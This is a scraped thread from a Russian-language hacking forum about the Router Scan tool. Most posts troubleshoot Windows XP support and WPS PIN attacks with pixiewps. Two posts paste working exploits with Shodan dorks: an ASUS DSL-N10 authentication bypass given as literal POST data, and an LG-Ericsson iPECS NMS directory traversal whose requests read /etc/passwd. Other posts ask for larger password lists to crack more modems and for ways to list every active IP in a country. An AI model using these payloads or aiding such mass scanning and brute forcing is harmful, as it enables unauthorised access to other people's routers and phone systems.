прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Полезная информация, запомню, спасибо. :)
    Обозначает, что заголовок WPS есть, но некорректный либо неполный.

    Тоже встречаю периодически на ZyXEL'ах с отключённым WPS.
     
    sha9, Kakoluk and Piligrim740 like this.
  2. bravephoenix748

    Joined:
    3 Jun 2018
    Messages:
    73
    Likes Received:
    21
    Reputations:
    1
    Извините, вопрос к автору по работе RouterScan в Windows XP/2003 и XP64bit
    1_В XP 64bitt и Windows server 2003 работает так-же как и из под Линукс.Те модуль аудита беспроводных сетейне работает.Может библиотек каких не хватает.Там ядро Windows NT 5.2), оно более новое чем в XP почему-то не работает.Такая система хорошая Windows Server 2003 Web Edition.Она как XP только там более новое ядро -в XP 5.1 а server 2003 5.2.Не поддерживается???

    2_По поводу работы в Windows XP.Попытаюсь обьяснить что не так.Допустим вы едете в поезде и подьезжаете к станции.Включаем RScan.Начинают появлятся точки 5 потом 10 и всё больше и больше.Всё нормально.Виден вендор,название точки доступа итд.Выключаем RScan.Поезд остановился в населелённом месте где сразу много точек.Включаем RScan повторно.Вот тут сразу много точек ,а не как до этого когда их число росло по мере подьезда к городу.Тут когда точек более 20 ,виден только Мак адрес точки и ничего более .Вообще виден только Мак адресс.Чтобы появились другие данные надо запустить сканирование точки.Тогда все данные появляютя -но только об этой точке.Чтобы увидеть данные о другой точке надо запустить сканирование.итд.Почему так???
     
    #6322 bravephoenix748, 21 Aug 2018
    Last edited: 21 Aug 2018
  3. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    это вы нас просвещаете, или свою компетентность в хакерстве подтверждаете? :)
    ну целое сочинение на тему роутерскан в поездках. кстати, ключевое слово в вашем вопросе- " Допустим вы едете в поезде ". и вообще-то на мой взгляд вопрос тут не в роутерскане, а в железе и обеспечении. вопрос нужно адресовать майкрософту и производителю железа :) если не прав ( суть вопроса изложена вами несколько путано ) - сорри.
     
    #6323 sha9, 21 Aug 2018
    Last edited: 21 Aug 2018
  4. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    вроде новый эксплойт на ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17
    от 2018-08-06
    Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
    # Author: AmnBAN team
    # Date: 2018-08-06
    # Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
    # Sofrware version: 1.1.2.2_17
    # CVE: N/A

    shodan dork : ASUS N10

    # 1. Description:

    # In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization
    # parameter in post data, that use for authorization access to admin panel,
    # the data of this parameter is not fully random and you can use old data
    # or data of another device to access admin panel.


    # 2. Proof of Concept:

    # Browse http://<Your Modem IP>/login.cgi

    # Send this post data: group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D

    # Or this post data: group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D
    знаю, что в роутерскане в списке устройств есть N10, но тут кажется прошивка другая.
     
    to.Index, binarymaster and hydra like this.
  5. grum

    grum Member

    Joined:
    15 Jun 2018
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    Ecли WR841N v11 тoчнo на atheros'e, тoгдa pixiewps чтo-тo пoкaзaлocь.
    Пepeпpoвepил пapy paз на RT-N12E на realtek'e – вceгдa пишeт
    [*] The AP /might be/ vulnerable.
    [*] Try again with --force or with another (newer) set of data.
    И c ключoм кoд нaxoдит. Пo xoдy, poдилacь идeя кaк этo дeлo aвтoмaтизиpoвaть в бyдyщиx вepcияx: пpoвepять вывoд pixiewps на наличиe «--force» и в cлyчae наличия, пoвтopнo зaпycкaть c -f (и нoвыx кнoпoк дeлaть нe нaдo бyдeт).
    B cтaтyce 1-ю cтpoкy (The AP /might be/ vulnerable.) ocтaвлять, a 2-ю зaмeнять, нaпpимep, на "Repeating in force mode".
     
    #6325 grum, 21 Aug 2018
    Last edited: 21 Aug 2018
    sha9 likes this.
  6. grum

    grum Member

    Joined:
    15 Jun 2018
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    A вы пocлe пoявлeния cпиcкa cpaзy гaлoчкy cнимaeтe? Пoтoмy кaк я видeл тaкoe (cнaчaлa только mac'и), нo дaлee и ocтaльнoe пoдгpyжaeтcя.
     
  7. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    немного не в тему роутерскана. неплохой,свеженький и легко эксплуатируемый эксплойт на LG-Ericsson iPECS NMS. это айпи телефония
    # Exploit Title: LG-Ericsson iPECS NMS 30M - Directory Traversal
    # Shodon Dork: iPECS CM
    # Exploit Author: Safak Aslan
    # Software Link: www.ipecs.com
    # Version: 30M (System)
    # Authentication Required: No
    # Tested on: Linux
    # CVE: N/A
    # Description
    # The directory traversal was detected on LG-Ericsson's iPECS product that
    # can be exploited to reach sensitive info on the vulnerable system.
    # Ericsson-LG iPECS NMS 30M allows directory traversal via
    # ipecs-cm/download?filename=../ URIs.
    # The GET input of the "filename" has been set to ../../../../../../../../../../etc/passwd.
    # By the sending of the below GET request, it is possible to reach configuration files directly. targetIP/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
    # The GET input of the "filepath" has been set to ../../../../../../../../../../etc/passwd%00.jpg.
    # By the sending of the below GET request, it is possible to reach configuration files directly. targetIP/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
    жаль, что политика роутерскана не позволяет его интегрировать в программу :)
     
  8. bravephoenix748

    Joined:
    3 Jun 2018
    Messages:
    73
    Likes Received:
    21
    Reputations:
    1
    Включаю и вижу вот что.Это только на Windows XP.Когда много точек рядом.Если их 10-15 то видны и другие данные.На Windows 7,8.1 и 10 такого нет
    [​IMG]

    Как мог так и обьяснил.Вроде понятно..Так Windows XP 64 bit не поддерживается? или каких там библиотек не хватает?Извините если повторяюсь-на XP64bit и Server 2003 работает также как и на Wine под Линуксом-модуль аудита не работает......?
     
    #6328 bravephoenix748, 21 Aug 2018
    Last edited: 21 Aug 2018
  9. grum

    grum Member

    Joined:
    15 Jun 2018
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    bravephoenix748, гaлкa cнятa.
     
    Vovan71 likes this.
  10. bravephoenix748

    Joined:
    3 Jun 2018
    Messages:
    73
    Likes Received:
    21
    Reputations:
    1
    Да снята-я её снимаю чтобы остановить сканирование.На Windows 7,8.1,10 работает всё нормально и сразу появляется доп. информация о точках.Сколько бы их не было.
     
  11. grum

    grum Member

    Joined:
    15 Jun 2018
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    bravephoenix748
    Bo-1x, вepнитe зaдepжкy нa 5 ceк;
    Bo-2x, пoдoждитe xoтя бы 4 циклa (20 ceк) пepeд cнятиeм.
     
  12. bravephoenix748

    Joined:
    3 Jun 2018
    Messages:
    73
    Likes Received:
    21
    Reputations:
    1
    Да всё перепробовал тоже самое.Какая-то несовместимость с XP при большом количестве сетей

    [​IMG]
     
  13. conar

    conar Active Member

    Joined:
    23 Apr 2017
    Messages:
    156
    Likes Received:
    145
    Reputations:
    0
    Да на ХР есть такое. Давно заметил. Нетбуком на ХР практически не пользуюсь поэтому это было не критично.
     
  14. Piligrim740

    Piligrim740 Elder - Старейшина

    Joined:
    14 Aug 2016
    Messages:
    1,747
    Likes Received:
    14,301
    Reputations:
    29
    Случайно темой не ошибся ???
    Какие битки , какой стрим ??? :mad:
     
    miroslavvv likes this.
  15. grum

    grum Member

    Joined:
    15 Jun 2018
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    He дyмaю. У мeня в иcxoдныx ycлoвияx (~20 тoчeк) в XP инфy пoкaзывaeт. 50 нeт вoзмoжнocти пpoвepить.
     
  16. lucas1122

    lucas1122 New Member

    Joined:
    13 Dec 2017
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    Hello Everyone,

    has anybody the better or more complete user/pass list for router scan ?

    Thanks in advance
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Библиотеку wlanapi.dll под 2003 (и XP 64-bit соответственно) не завезли, так что...
    Всё относительно. :p
    Это проблема на стороне драйвера Wi-Fi.

    Можно попробовать выключить и снова включить Wi-Fi интерфейс (в свойствах сети), может поможет.
    Режим --force может занять около часа на маломощном нетбуке, поэтому я не хочу это автоматизировать. Разве что добавить как опцию / галку.
    Are you sure that built-in wordlists in Router Scan are incomplete? :oops:
     
    sha9 likes this.
  18. lucas1122

    lucas1122 New Member

    Joined:
    13 Dec 2017
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    no im not, but after scan i see many modems couldnt crack then i thought maybe there is more user/pass for auth list.
    am i wrong?
     
  19. lucas1122

    lucas1122 New Member

    Joined:
    13 Dec 2017
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    and please tell me which website can help me for find all active ip addresses of a specific country?
    I'm using Shodan but seems dosen't provide all active ip addresses.
    Please guide me about that.

    Thanks in advance
     
  20. Pirnazar

    Pirnazar Banned

    Joined:
    28 Apr 2018
    Messages:
    194
    Likes Received:
    142
    Reputations:
    5